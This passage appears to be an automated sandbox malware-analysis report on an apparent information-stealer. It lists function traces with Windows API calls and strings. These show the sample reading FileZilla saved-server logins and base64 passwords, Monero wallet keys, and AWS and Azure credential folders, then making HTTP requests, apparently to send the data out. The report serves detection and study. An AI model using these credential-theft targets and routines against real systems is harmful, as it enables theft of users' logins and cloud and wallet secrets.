                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                              Function 00690250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                                • Part of subcall function 00698DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00698E0B
                                • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                                • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                                • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                                • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                                • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                                • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                                • Part of subcall function 006899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006899EC
                                • Part of subcall function 006899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00689A11
                                • Part of subcall function 006899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00689A31
                                • Part of subcall function 006899C0: ReadFile.KERNEL32(000000FF,?,00000000,0068148F,00000000), ref: 00689A5A
                                • Part of subcall function 006899C0: LocalFree.KERNEL32(0068148F), ref: 00689A90
                                • Part of subcall function 006899C0: CloseHandle.KERNEL32(000000FF), ref: 00689A9A
                                • Part of subcall function 00698E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00698E52
                              • GetProcessHeap.KERNEL32(00000000,000F423F,006A0DBA,006A0DB7,006A0DB6,006A0DB3), ref: 00690362
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00690369
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 00690385
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB2), ref: 00690393
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 006903CF
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB2), ref: 006903DD
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 00690419
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB2), ref: 00690427
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00690463
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB2), ref: 00690475
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB2), ref: 00690502
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB2), ref: 0069051A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB2), ref: 00690532
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB2), ref: 0069054A
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00690562
                              • lstrcat.KERNEL32(?,profile: null), ref: 00690571
                              • lstrcat.KERNEL32(?,url: ), ref: 00690580
                              • lstrcat.KERNEL32(?,00000000), ref: 00690593
                              • lstrcat.KERNEL32(?,006A1678), ref: 006905A2
                              • lstrcat.KERNEL32(?,00000000), ref: 006905B5
                              • lstrcat.KERNEL32(?,006A167C), ref: 006905C4
                              • lstrcat.KERNEL32(?,login: ), ref: 006905D3
                              • lstrcat.KERNEL32(?,00000000), ref: 006905E6
                              • lstrcat.KERNEL32(?,006A1688), ref: 006905F5
                              • lstrcat.KERNEL32(?,password: ), ref: 00690604
                              • lstrcat.KERNEL32(?,00000000), ref: 00690617
                              • lstrcat.KERNEL32(?,006A1698), ref: 00690626
                              • lstrcat.KERNEL32(?,006A169C), ref: 00690635
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB2), ref: 0069068E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              • Opcode ID: 7537ce5b0826845fc8ddc56638ce3410b19098c3e793941ea2a53f1307cb8263
                              • Instruction ID: 64120f77521b2851068dfa968744d2e22df424645012cd3a58f638fbc3506204
                              • Opcode Fuzzy Hash: 7537ce5b0826845fc8ddc56638ce3410b19098c3e793941ea2a53f1307cb8263
                              • Instruction Fuzzy Hash: 6BD11B72910108ABDF48FBE4DD96EEE73BEFF15300F444518F502A6491DE74AA06CBA6
                              Function 00685960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                                • Part of subcall function 006847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00684839
                                • Part of subcall function 006847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00684849
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 006859F8
                              • StrCmpCA.SHLWAPI(?,0148E838), ref: 00685A13
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00685B93
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0148E778,00000000,?,0148A210,00000000,?,006A1A1C), ref: 00685E71
                              • lstrlen.KERNEL32(00000000), ref: 00685E82
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00685E93
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00685E9A
                              • lstrlen.KERNEL32(00000000), ref: 00685EAF
                              • lstrlen.KERNEL32(00000000), ref: 00685ED8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00685EF1
                              • lstrlen.KERNEL32(00000000,?,?), ref: 00685F1B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00685F2F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00685F4C
                              • InternetCloseHandle.WININET(00000000), ref: 00685FB0
                              • InternetCloseHandle.WININET(00000000), ref: 00685FBD
                              • HttpOpenRequestA.WININET(00000000,0148E7A8,?,0148DF30,00000000,00000000,00400100,00000000), ref: 00685BF8
                                • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                                • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                                • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                                • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                                • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                              • InternetCloseHandle.WININET(00000000), ref: 00685FC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 874700897-2180234286
                              • Opcode ID: 6b55d403774e588a039e9b2a0c1232e351c85d74ce1491db9a2bed4e307aeadf
                              • Instruction ID: a7d8e95c7f25226581ef76edf47647f08ed6f000acd598773f3e9c6be14ebbf3
                              • Opcode Fuzzy Hash: 6b55d403774e588a039e9b2a0c1232e351c85d74ce1491db9a2bed4e307aeadf
                              • Instruction Fuzzy Hash: D412DE71820128AADF55EBE0DD95FEEB3BEBF14700F50419DB10A62491DF702A49CFA9
                              Function 0068CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                                • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                                • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                                • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                                • Part of subcall function 00698B60: GetSystemTime.KERNEL32(006A0E1A,0148A5A0,006A05AE,?,?,006813F9,?,0000001A,006A0E1A,00000000,?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 00698B86
                                • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                                • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0068CF83
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0068D0C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0068D0CE
                              • lstrcat.KERNEL32(?,00000000), ref: 0068D208
                              • lstrcat.KERNEL32(?,006A1478), ref: 0068D217
                              • lstrcat.KERNEL32(?,00000000), ref: 0068D22A
                              • lstrcat.KERNEL32(?,006A147C), ref: 0068D239
                              • lstrcat.KERNEL32(?,00000000), ref: 0068D24C
                              • lstrcat.KERNEL32(?,006A1480), ref: 0068D25B
                              • lstrcat.KERNEL32(?,00000000), ref: 0068D26E
                              • lstrcat.KERNEL32(?,006A1484), ref: 0068D27D
                              • lstrcat.KERNEL32(?,00000000), ref: 0068D290
                              • lstrcat.KERNEL32(?,006A1488), ref: 0068D29F
                              • lstrcat.KERNEL32(?,00000000), ref: 0068D2B2
                              • lstrcat.KERNEL32(?,006A148C), ref: 0068D2C1
                              • lstrcat.KERNEL32(?,00000000), ref: 0068D2D4
                              • lstrcat.KERNEL32(?,006A1490), ref: 0068D2E3
                                • Part of subcall function 0069A820: lstrlen.KERNEL32(00684F05,?,?,00684F05,006A0DDE), ref: 0069A82B
                                • Part of subcall function 0069A820: lstrcpy.KERNEL32(006A0DDE,00000000), ref: 0069A885
                              • lstrlen.KERNEL32(?), ref: 0068D32A
                              • lstrlen.KERNEL32(?), ref: 0068D339
                                • Part of subcall function 0069AA70: StrCmpCA.SHLWAPI(01488F38,0068A7A7,?,0068A7A7,01488F38), ref: 0069AA8F
                              • DeleteFileA.KERNEL32(00000000), ref: 0068D3B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              • Opcode ID: 978f44702931242d4c6ce66a1c3da1dd64fd7337b7f4cfd5a98d5ec27d78fb1b
                              • Instruction ID: 12574e7745b380c10225870d657197490b867f3b85c160beed4ea34fbfba2b52
                              • Opcode Fuzzy Hash: 978f44702931242d4c6ce66a1c3da1dd64fd7337b7f4cfd5a98d5ec27d78fb1b
                              • Instruction Fuzzy Hash: 8DE12B71910118ABCF48FBE0DD96EEE73BEBF14304F104159F506A6491DE35AE06CBAA
                              Function 0068C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                                • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                                • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                                • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                                • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                                • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0148D518,00000000,?,006A144C,00000000,?,?), ref: 0068CA6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0068CA89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0068CA95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0068CAA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0068CAD9
                              • StrStrA.SHLWAPI(?,0148D428,006A0B52), ref: 0068CAF7
                              • StrStrA.SHLWAPI(00000000,0148D548), ref: 0068CB1E
                              • StrStrA.SHLWAPI(?,0148DC40,00000000,?,006A1458,00000000,?,00000000,00000000,?,014890D8,00000000,?,006A1454,00000000,?), ref: 0068CCA2
                              • StrStrA.SHLWAPI(00000000,0148DC80), ref: 0068CCB9
                                • Part of subcall function 0068C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0068C871
                                • Part of subcall function 0068C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0068C87C
                              • StrStrA.SHLWAPI(?,0148DC80,00000000,?,006A145C,00000000,?,00000000,01488FD8), ref: 0068CD5A
                              • StrStrA.SHLWAPI(00000000,014891E8), ref: 0068CD71
                                • Part of subcall function 0068C820: lstrcat.KERNEL32(?,006A0B46), ref: 0068C943
                                • Part of subcall function 0068C820: lstrcat.KERNEL32(?,006A0B47), ref: 0068C957
                                • Part of subcall function 0068C820: lstrcat.KERNEL32(?,006A0B4E), ref: 0068C978
                              • lstrlen.KERNEL32(00000000), ref: 0068CE44
                              • CloseHandle.KERNEL32(00000000), ref: 0068CE9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
                              • API String ID: 3744635739-3916222277
                              • Opcode ID: f55cfe7b5c3bf3d7eb6bdbad712b667ebfd574a1ca8a285bb02fae05a1e58f47
                              • Instruction ID: c99e1035301b9a48f9c303504991da4a1e1476a82cefe49162620682c6ed5989
                              • Opcode Fuzzy Hash: f55cfe7b5c3bf3d7eb6bdbad712b667ebfd574a1ca8a285bb02fae05a1e58f47
                              • Instruction Fuzzy Hash: ABE1EA71910108ABDF58EBE4DD95EEEB7BEBF14300F00415DF10666591EF306A4ACBAA
                              Function 00698320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • RegOpenKeyExA.ADVAPI32(00000000,0148B688,00000000,00020019,00000000,006A05B6), ref: 006983A4
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00698426
                              • wsprintfA.USER32 ref: 00698459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0069847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 0069848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00698499
                                • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: 82fbc7d00bd7dc164c9c02791cf7797ef0c3f761ecbacee7249462cca7be2276
                              • Instruction ID: efcb057fe12393bff11fbfda853cf81b0561d7ec0854b53f26817e1981f2d8a9
                              • Opcode Fuzzy Hash: 82fbc7d00bd7dc164c9c02791cf7797ef0c3f761ecbacee7249462cca7be2276
                              • Instruction Fuzzy Hash: 6F81197191011CABEB68DB90CD95FEAB7BDBF08704F008298E109A6580DF716A85CFE5
                              Function 00694D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00698DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00698E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00694DB0
                              • lstrcat.KERNEL32(?,\.azure\), ref: 00694DCD
                                • Part of subcall function 00694910: wsprintfA.USER32 ref: 0069492C
                                • Part of subcall function 00694910: FindFirstFileA.KERNEL32(?,?), ref: 00694943
                              • lstrcat.KERNEL32(?,00000000), ref: 00694E3C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 00694E59
                                • Part of subcall function 00694910: StrCmpCA.SHLWAPI(?,006A0FDC), ref: 00694971
                                • Part of subcall function 00694910: StrCmpCA.SHLWAPI(?,006A0FE0), ref: 00694987
                                • Part of subcall function 00694910: FindNextFileA.KERNEL32(000000FF,?), ref: 00694B7D
                                • Part of subcall function 00694910: FindClose.KERNEL32(000000FF), ref: 00694B92
                              • lstrcat.KERNEL32(?,00000000), ref: 00694EC8
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00694EE5
                                • Part of subcall function 00694910: wsprintfA.USER32 ref: 006949B0
                                • Part of subcall function 00694910: StrCmpCA.SHLWAPI(?,006A08D2), ref: 006949C5
                                • Part of subcall function 00694910: wsprintfA.USER32 ref: 006949E2
                                • Part of subcall function 00694910: PathMatchSpecA.SHLWAPI(?,?), ref: 00694A1E
                                • Part of subcall function 00694910: lstrcat.KERNEL32(?,0148E848), ref: 00694A4A
                                • Part of subcall function 00694910: lstrcat.KERNEL32(?,006A0FF8), ref: 00694A5C
                                • Part of subcall function 00694910: lstrcat.KERNEL32(?,?), ref: 00694A70
                                • Part of subcall function 00694910: lstrcat.KERNEL32(?,006A0FFC), ref: 00694A82
                                • Part of subcall function 00694910: lstrcat.KERNEL32(?,?), ref: 00694A96
                                • Part of subcall function 00694910: CopyFileA.KERNEL32(?,?,00000001), ref: 00694AAC
                                • Part of subcall function 00694910: DeleteFileA.KERNEL32(?), ref: 00694B31
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
